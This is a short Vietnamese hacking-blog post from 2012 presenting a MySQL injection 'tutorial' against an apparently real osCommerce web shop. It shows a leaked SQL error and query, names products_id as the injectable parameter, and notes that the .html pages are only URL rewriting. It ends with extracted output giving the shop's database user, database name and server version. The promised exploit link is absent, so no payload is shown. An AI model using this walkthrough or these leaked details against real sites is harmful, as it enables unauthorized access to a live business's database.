Thứ Bảy, 16 tháng 6, 2012
[TUT] - MySQL Injection - Shop .html
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') and p.products_quantity > 0 and p.products_status = '1' order by rand() limi' at line 1
select p.products_id, p.products_quantity, p.products_image, pd.products_name, p.products_price from all_products p left join all_products_description pd on pd.products_id = p.products_id and pd.language_id = '4' left join all_manufacturers m using(manufacturers_id) left join all_products_to_categories pc on pc.products_id = p.products_id where pc.categories_id = '6' and m.sthefani_manufacturers_status = '1' and p.manufacturers_id = '157' and p.products_id not in (3375\') and p.products_quantity > 0 and p.products_status = '1' order by rand() limit 4
[TEP STOP]
Nhiều bạn nghĩ đây là site .html thì chiến thế nào?
Đơn giản cái đuôi .html chỉ là Rewrite URL dùng htaccess
Về bản chất cái site này là PHP vs MySQL
Và với kinh nghiệm bản thân thì m biết cái source của site này là oscommerce
Và cái id bị lôi là products_id (nhìn ở p.products_id not in (3375\'))
Và Khai thác như bình thường thôi.
Link exploit cho các bạn :
End TUT.lorenzo_user@localhost : lorenzo_lojas : 5.0.92-community lorenzo_user@localhost : lorenzo_lojas : 5.0.92-community
Đăng ký:
Đăng Nhận xét (Atom)
Không có nhận xét nào: